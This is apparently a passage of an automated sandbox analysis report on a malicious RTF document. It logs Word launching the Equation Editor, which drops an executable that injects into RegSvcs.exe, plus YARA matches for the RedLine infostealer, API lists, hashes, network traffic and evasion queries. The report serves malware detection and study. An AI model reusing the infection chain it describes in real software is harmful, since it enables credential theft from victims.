                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe | Code function: 5_2_0090D74C GetSystemMetrics,GetSystemMetrics,MoveWindow,SendMessageW,SendMessageW,ShowWindow,InvalidateRect,NtdllDialogWndProc_W,5_2_0090D74C
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe | Code function: 5_2_0088189B NtdllDialogWndProc_W,5_2_0088189B
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe | Code function: 5_2_0090DA9A NtdllDialogWndProc_W,5_2_0090DA9A
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe | Code function: 5_2_0090BF4D NtdllDialogWndProc_W,CallWindowProcW,5_2_0090BF4D
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe | Code function: 5_2_008E40B1: CreateFileW,_memset,DeviceIoControl,CloseHandle,5_2_008E40B1
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe | Code function: 5_2_008D8858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,756C1AAC,CreateProcessAsUserW,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,5_2_008D8858
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_008E545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,5_2_008E545F
                    Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ExtExport2[1].exe B5E250A95073B5DFE33F66C13CC89DA0FC8D3AF226E5EFB06BB8FCFD9A4CD6EC
                    Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Roaming\notorious53209.exe B5E250A95073B5DFE33F66C13CC89DA0FC8D3AF226E5EFB06BB8FCFD9A4CD6EC
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe | Code function: String function: 008A8B40 appears 42 times
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe | Code function: String function: 008A0D27 appears 70 times
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe | Code function: String function: 00887F41 appears 35 times
                    Source: ExtExport2[1].exe.2.dr | Static PE information: Resource name: RT_STRING type: ARC archive data, dynamic LZW
                    Source: notorious53209.exe.2.dr | Static PE information: Resource name: RT_STRING type: ARC archive data, dynamic LZW
                    Source: 2MbHBiqXH2.rtf, type: SAMPLE | Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embedding one of the objects mostly observed in exploit documents.
                    Source: 5.2.notorious53209.exe.590000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 5.2.notorious53209.exe.590000.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 5.2.notorious53209.exe.590000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 5.2.notorious53209.exe.590000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 00000006.00000002.387639158.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 00000005.00000002.358815022.0000000000590000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 00000005.00000002.358815022.0000000000590000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: Process Memory Space: notorious53209.exe PID: 3092, type: MEMORYSTR | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: Process Memory Space: RegSvcs.exe PID: 3116, type: MEMORYSTR | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winRTF@7/45@3/2
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe | Code function: 5_2_008EA2D5 GetLastError,FormatMessageW
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe | Code function: 5_2_008D8713 AdjustTokenPrivileges,CloseHandle
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe | Code function: 5_2_008D8CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe | Code function: 5_2_008EB59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe | Code function: 5_2_008FF121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe | Code function: 5_2_008F86D0 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe | Code function: 5_2_00884FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\Desktop\~$bHBiqXH2.rtf
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Mutant created: NULL
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\CVR73B8.tmp
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File read: C:\Users\desktop.ini
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File read: C:\Windows\System32\drivers\etc\hosts
                    Source: 2MbHBiqXH2.rtf | ReversingLabs: Detection: 36%
                    Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\notorious53209.exe "C:\Users\user\AppData\Roaming\notorious53209.exe"
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Roaming\notorious53209.exe"
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: wow64win.dll
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: wow64cpu.dll
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: msi.dll
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: cryptsp.dll
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: rpcrtremote.dll
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: dwmapi.dll
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: version.dll
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: secur32.dll
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: winhttp.dll
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: webio.dll
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: iphlpapi.dll
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: winnsi.dll
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: dnsapi.dll
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: nlaapi.dll
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: dhcpcsvc6.dll
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: dhcpcsvc.dll
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: rasadhlp.dll
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: credssp.dll
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: ncrypt.dll
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: bcrypt.dll
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe | Section loaded: wow64win.dll
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe | Section loaded: wow64cpu.dll
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe | Section loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe | Section loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe | Section loaded: mpr.dll
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe | Section loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe | Section loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe | Section loaded: winmm.dll
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe | Section loaded: wsock32.dll
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe | Section loaded: dwmapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
                    Source: 2MbHBiqXH2.LNK.0.dr | LNK file: ..\..\..\..\..\Desktop\2MbHBiqXH2.rtf
                    Source: Window Recorder | Window detected: More than 3 window changes detected
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                    Source: Binary string: wntdll.pdb | source: notorious53209.exe, 00000005.00000003.358079357.0000000002950000.00000004.00001000.00020000.00000000.sdmp, notorious53209.exe, 00000005.00000003.358487589.0000000002B30000.00000004.00001000.00020000.00000000.sdmp
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe | Code function: 5_2_0099F090 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_005AC340 push eax; retf 0064h (2_2_005AC341)
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_005A3B61 push eax; retf 0064h (2_2_005A3B91)
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_005A9F01 push esp; retf (2_2_005A9F04)
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe | Code function: 5_2_008A8B85 push ecx; ret (5_2_008A8B98)
                    Source: initial sample | Static PE information: section name: UPX0
                    Source: initial sample | Static PE information: section name: UPX1
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Roaming\notorious53209.exe
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ExtExport2[1].exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ASP.NET_4.0.30319\Names

                    Hooking and other Techniques for Hiding and Protection

                    Source: unknown | Network traffic detected: HTTP traffic on port 49163 -> 7474
                    Source: unknown | Network traffic detected: HTTP traffic on port 7474 -> 49163
                    Source: unknown | Network traffic detected: HTTP traffic on port 49165 -> 7474
                    Source: unknown | Network traffic detected: HTTP traffic on port 7474 -> 49165
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe | Code function: 5_2_00884A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe | Code function: 5_2_009055FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exe | Code function: 5_2_008A33C7 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
